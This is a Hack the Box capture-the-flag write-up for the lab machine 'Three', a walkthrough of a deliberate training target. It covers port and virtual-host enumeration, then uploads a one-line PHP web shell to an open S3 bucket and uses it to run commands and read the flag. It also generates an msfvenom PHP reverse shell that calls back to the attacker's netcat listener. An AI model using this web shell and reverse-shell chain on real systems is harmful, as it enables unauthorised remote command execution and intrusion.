Hack the Box Starting Point Tier 1: Three

Enumeration

Nmap

The Nmap scan shows that the target has OpenSSH running on port 22 and an Apache HTTP server on port 80.

nmap -sCV -Pn -T4 -p- 10.129.67.184

HTTP

Opened the target’s IP address in a browser. No clickable links.

From the contact field, we can see a domain address: thetoppers.htb Added the address to the /etc/hosts file to match the target’s IP address.

sudo nano /etc/hosts

Gobuster

Next, we will use Gobuster to find subdomains for the address thetoppers.htb.

Gobuster found an available (status 404) subdomain s3.thetoppers.htb

gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb

Added the subdomain s3.thetoppers.htb to the /etc/hosts file to match the target’s IP address.

sudo nano /etc/hosts

Opened the address s3.thetoppers.htb in the browser and the page only has JSON: {“status”: “running”}

Amazon S3

S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects. Source: https://docs.aws.amazon.com/AmazonS3/latest/userguide/Welcome.html

We will use a tool called awscli to list the S3 objects.

Installed and configured awscli tool. In the configuration, randomly wrote in the fields “temp”.

sudo apt update && sudo apt install awscli -y
aws configure

Listed S3 bucket items. We can see a directory .htaccess and a file index.php in the bucket.

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Utilizing the browser plugin Wappalyzer and from the file index.php we can see that the thetoppers.htb uses PHP. Next, we will create a PHP file called shell.php with the following content:
<?php system($_GET[“cmd”]); ?>

echo '<?php system($_GET["cmd"]); ?>' > shell.php

The file uses system() function, which allows using cmd in the URL parameter to execute commands on the target.

Uploaded the file shell.php to the S3 bucket thetoppers.htb.

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

Next, we can try to execute the ls command in the URL parameter using cmd, by typing in the address bar: http://thetoppers.htb/shell.php?cmd=ls

Successfully executed the ls command, because were able to list the contents of the directory.

Captured the request with Burp Suite and sent it to the Repeater tab. Navigated back one directory and listed the contents with the command: ls+../

The root flag can be found in the file flag.txt. The content of the file flag.txt can be read with the command: cat+../flag.txt

Reverse shell

In order to get a shell to target we must first generate a PHP reverse shell file with msfvenom:

msfvenom -p php/reverse_php LHOST=10.10.14.76 LPORT=443 -f raw -o reverse.php

Uploaded the file reverse.php to the S3 bucket thetoppers.htb.

aws --endpoint=http://s3.thetoppers.htb s3 cp reverse.php s3://thetoppers.htb

Started a Netcat listener on port 443.

nc -lvnp 443

Call the address http://thetoppers.htb/reverse.php with curl or load it in a browser.

curl http://thetoppers.htb/reverse.php

Successfully received a reverse shell in the Netcat listener as a user www-data. The flag can be obtained from the directory /var/www